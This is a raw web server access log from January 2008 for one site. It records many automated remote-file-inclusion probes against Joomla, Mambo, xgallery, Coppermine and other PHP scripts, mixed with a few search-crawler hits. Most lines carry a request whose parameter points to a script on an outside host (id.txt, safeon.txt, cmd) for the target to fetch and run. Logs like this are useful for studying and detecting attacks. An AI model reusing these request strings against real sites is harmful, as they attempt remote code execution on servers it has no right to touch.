211.233.63.186 - - [06/Jan/2008:22:22:41 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:22:41 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:22:42 -0800] "GET /logs/access_071225.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.25.148.134 - - [06/Jan/2008:22:23:39 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.148.134 - - [06/Jan/2008:22:23:40 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.148.134 - - [06/Jan/2008:22:23:40 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.157.58.25 - - [06/Jan/2008:22:23:58 -0800] "GET /config.php?path_to_root=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.157.58.25 - - [06/Jan/2008:22:23:58 -0800] "GET /config.php?path_to_root=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:25:11 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:22:31:45 -0800] "GET /logs/access_071222.log/index.php?sub=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:22:31:45 -0800] "GET /index.php?sub=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:22:31:45 -0800] "GET /logs/index.php?sub=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.6.131.4 - - [06/Jan/2008:22:32:00 -0800] "GET /logs/access_071222.log/index.php?sub=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.6.131.4 - - [06/Jan/2008:22:32:00 -0800] "GET /index.php?sub=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.6.131.4 - - [06/Jan/2008:22:32:00 -0800] "GET /logs/index.php?sub=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:22:33:19 -0800] "GET /logs//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:22:33:20 -0800] "GET //securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.28.71 - - [06/Jan/2008:22:35:57 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:22:36:50 -0800] "GET /logs/access_071225.log/index.php?pagina1=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:22:36:51 -0800] "GET /index.php?pagina1=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.137.122 - - [06/Jan/2008:22:36:51 -0800] "GET /logs/index.php?pagina1=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
71.6.131.4 - - [06/Jan/2008:22:37:26 -0800] "GET /logs/access_071225.log/index.php?pagina1=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.6.131.4 - - [06/Jan/2008:22:37:26 -0800] "GET /index.php?pagina1=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.6.131.4 - - [06/Jan/2008:22:37:26 -0800] "GET /logs/index.php?pagina1=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:22:38:06 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:22:38:07 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:22:38:09 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:38:49 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:38:49 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:38:50 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:39:14 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:39:15 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:39:15 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:40:43 -0800] "GET /logs/access_071205.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.233.63.186 - - [06/Jan/2008:22:41:34 -0800] "GET /logs/access_071018.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.theatreinthegrove.org/cms/images/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.234.252.30 - - [06/Jan/2008:22:43:22 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.129.152.113 - - [06/Jan/2008:22:45:13 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.129.152.113 - - [06/Jan/2008:22:45:34 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:22:45:45 -0800] "GET /logs/access_071210.log//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.19 - - [06/Jan/2008:22:46:18 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.193.240.89 - - [06/Jan/2008:22:47:04 -0800] "GET /logs//tools/send_reminders.php?includedir=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
62.193.240.89 - - [06/Jan/2008:22:47:06 -0800] "GET //tools/send_reminders.php?includedir=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
74.6.23.139 - - [06/Jan/2008:22:47:52 -0800] "GET /minamijewelry/kanji1.psd HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:48:14 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:22:48:20 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [06/Jan/2008:22:48:22 -0800] "GET /logs/access_071216.log//securemembership/plugins/payment/authorize_aim/authorize_aim.inc.php?config[root_dir]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:22:49:24 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:22:49:25 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:22:49:26 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.249.212.252 - - [06/Jan/2008:22:53:43 -0800] "GET //skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.249.212.252 - - [06/Jan/2008:22:53:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://members.lycos.co.uk/zuopwn/base?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:22:54:06 -0800] "GET /logs/access_071229.log//login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:22:54:07 -0800] "GET //login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:22:54:07 -0800] "GET /logs//login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
163.27.43.2 - - [06/Jan/2008:22:54:17 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:54:30 -0800] "GET /logs/access_071229.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:54:36 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:54:36 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.226 - - [06/Jan/2008:22:54:54 -0800] "GET //tools/send_reminders.php?includedir=http://mpva.com.au/_baks/.../test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
216.118.97.226 - - [06/Jan/2008:22:54:54 -0800] "GET /logs//tools/send_reminders.php?includedir=http://mpva.com.au/_baks/.../test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
66.178.176.36 - - [06/Jan/2008:22:57:01 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:57:56 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:57:56 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:57:56 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:22:58:21 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.205.79.5 - - [06/Jan/2008:22:58:55 -0800] "GET /logs/access_071212.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.sajin88.com/bbs/data1/alba.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.234.143.136 - - [06/Jan/2008:22:59:06 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
85.234.143.136 - - [06/Jan/2008:22:59:07 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://www.stlouisdreamhome.com/components/com_joomlalib/red.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:22:59:18 -0800] "GET / HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:00:02 -0800] "GET /logs/access_071229.log//login.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:00:02 -0800] "GET //login.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:00:02 -0800] "GET /logs//login.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:00:05 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:00:05 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:00:05 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:00:18 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:00:29 -0800] "GET /logs/access_071229.log//login.php?dir=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:00:29 -0800] "GET //login.php?dir=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:00:29 -0800] "GET /logs//login.php?dir=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.240.89 - - [06/Jan/2008:23:02:02 -0800] "GET /common/db.php?commonpath=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
62.193.240.89 - - [06/Jan/2008:23:02:05 -0800] "GET /logs/common/db.php?commonpath=http://valhalla360.com/images/help.jpg/crit?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:03:09 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:03:09 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:03:09 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.29.32 - - [06/Jan/2008:23:03:14 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:03:22 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:04:37 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:04:38 -0800] "GET //skin/zero_vote/error.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:04:38 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:05:00 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:05:00 -0800] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:05:01 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:05:30 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://www.watertowncremationproducts.com/id.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.42.161 - - [06/Jan/2008:23:05:44 -0800] "GET /logs/access_071229.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/erickcakep/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:06:41 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:06:41 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:06:41 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.8.71 - - [06/Jan/2008:23:06:48 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:07:04 -0800] "GET /logs/access_071229.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:07:04 -0800] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:07:04 -0800] "GET /logs//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:07:08 -0800] "GET /logs/access_071216.log//modules/coppermine/themes/default/theme.php?THEME_DIR=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.246.28.145 - - [06/Jan/2008:23:09:10 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://it.ppboces.org/cal/tools/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:23:09:13 -0800] "GET /logs/access_071225.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:23:09:14 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:23:09:14 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
85.234.252.30 - - [06/Jan/2008:23:09:28 -0800] "GET /logs/access_071225.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.252.30 - - [06/Jan/2008:23:09:28 -0800] "GET /logs/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:23:10:54 -0800] "GET /logs/access_071229.log//login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:23:10:58 -0800] "GET //login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.152.1.228 - - [06/Jan/2008:23:11:01 -0800] "GET /logs//login.php?dir=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.252.30 - - [06/Jan/2008:23:12:08 -0800] "GET /logs/access_071221.log/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/mobileuser.22844354/asia/asia.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.244.5.78 - - [06/Jan/2008:23:14:35 -0800] "GET /?mosConfig_absolute_path=http://84.244.5.78/cmd? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:23:14:48 -0800] "GET /logs/access_071224.log//akocomments.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:23:14:49 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [06/Jan/2008:23:14:50 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://dragoc.bravehost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.6.19.148 - - [06/Jan/2008:23:20:01 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.29.21 - - [06/Jan/2008:23:22:30 -0800] "GET /logs/access_070809.log HTTP/1.0" 200 38136 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
